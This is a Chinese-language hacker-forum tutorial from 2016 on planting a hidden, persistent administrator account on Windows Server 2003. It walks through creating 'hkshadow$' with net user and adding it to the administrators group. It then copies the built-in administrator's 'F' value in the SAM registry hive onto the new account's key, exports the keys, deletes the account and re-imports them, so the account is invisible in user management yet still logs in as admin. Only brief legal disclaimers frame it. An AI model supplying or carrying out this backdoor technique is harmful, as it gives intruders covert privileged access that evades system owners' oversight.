HanDs
NO.2

win2003下创建永远的隐藏帐户 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

操作一、打开注册表:HKEY_LOCAL_MACHINE\SAM\SAM

SAM是保存用户帐号的地方,不过这个“项”在默认情况下是不可见的。我们如果想看内部的内容就必须首先对其授权。(建议对注册表不是很熟悉的朋友不要随便改动注册表)

操作二、认识注册表中的帐号分类

在OS中的用户帐号无论是内置帐号,还是后建帐号,在注册表中都能看见。不过有两个帐号大家一定要能够认识,那就是管理员帐号和guest帐号。(如下图)

在这个图中”000001fa4”表示的是管理员帐号,即使管理员帐号被重命名了这个值也是不会变的,所以我们可以通过这个值来判断,重命名后的管理员帐号。

“000001fa5”表示的是guest帐号,同样这个值也不会因为,来宾帐号给重命名而改变。剩下的其 它值基本上就是后来创建的用户帐号,生成值了。 认识了注册表后,现在我们就来利用”net user”命令创建帐号了,创建隐藏帐号必须在CMD下。利用这组命令的,如果不熟悉这个命令使用的朋友可以参照我的另外一篇文章,就是有关常见命令的时候,不过这些命令也可以在OS的帮助中找到。

一、先建立隐藏用户 hkshadow$ 1、net user hkshadow$ 123123 /add 这里的意思是说,建立个hkshadow$ 帐户密码是123213(如下图)

在DOS窗口下执行net localgroup administrators hkshadow$ /add 这里的意思是说把hkshadow$用户添加到管理组,以便让我们创建用户具备管理员权限。

一、观察注册表中的变化,并对注册表做相应的修改。 HKEY_LOCAL_MACHINE\SAM\SAM

1、找到我们刚刚创建的用户帐号(如图)

在这幅图中我们可以看见”000003F0”就是我们刚新建立的”hkshadow$”帐号。

2、在注册表中多帐号权限复制

找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 这个项,打开”000001f4”项,然后再打开”F”(如下图)。

然后将这里面的值,全选,粘帖并覆盖到”000003F0”的”F”值.

3、导出注册表值

现在将注册表中的“000001f4”、“000003F0”和“hkshadow$”这三项注册表值导出并保存好。(如下图)

4、删除帐号

接下来我们再次进入“CMD”中删除“hkshadow$”帐号。

删除帐号后,则注册表中的值也就没有了,这个时候我们再把刚才导出的注册表项,导入到注册表中。 这个时候我们打开“本地计算机用户和组”就看不见“hkshadow$”帐号了,但是我们却可以使用该帐号登录计算机,并且具备管理员权限。


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
win2003 下创建永远的隐藏帐户
#1楼
发帖时间:2016-8-10   |   查看数:0   |   回复数:0
游客组